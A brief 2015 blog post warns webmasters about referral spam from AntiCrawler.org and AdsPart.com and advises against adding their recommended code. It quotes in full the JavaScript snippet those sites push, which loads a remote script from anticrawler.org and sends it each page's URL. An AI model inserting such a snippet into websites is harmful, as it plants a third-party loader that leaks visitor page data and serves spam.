Fake Referral Spam

Saturday, January 17, 2015 Articles, News Comments Off on Fake Referral Spam

It is time to ignore and block fake referral spam from AntiCrawler.org and AdsPart.com which shows the following on their pages.

Put this JS to all pages of your website and you’ll never see BAD bots and crawlers

<script>
document.write(‘<script src=”//anticrawler.org/plugin/anticrawler.php?u=’ + encodeURIComponent(document.location.href) + ‘”></’ + ‘script>’);
</script>

Adding the code will send out fake referral so you are encourage not to add the code and delete any cookies the site may have set. Since my blog is very popular on Bing and Yahoo, I have been a target for these type of spam and has a block list in place to block them as they are created.
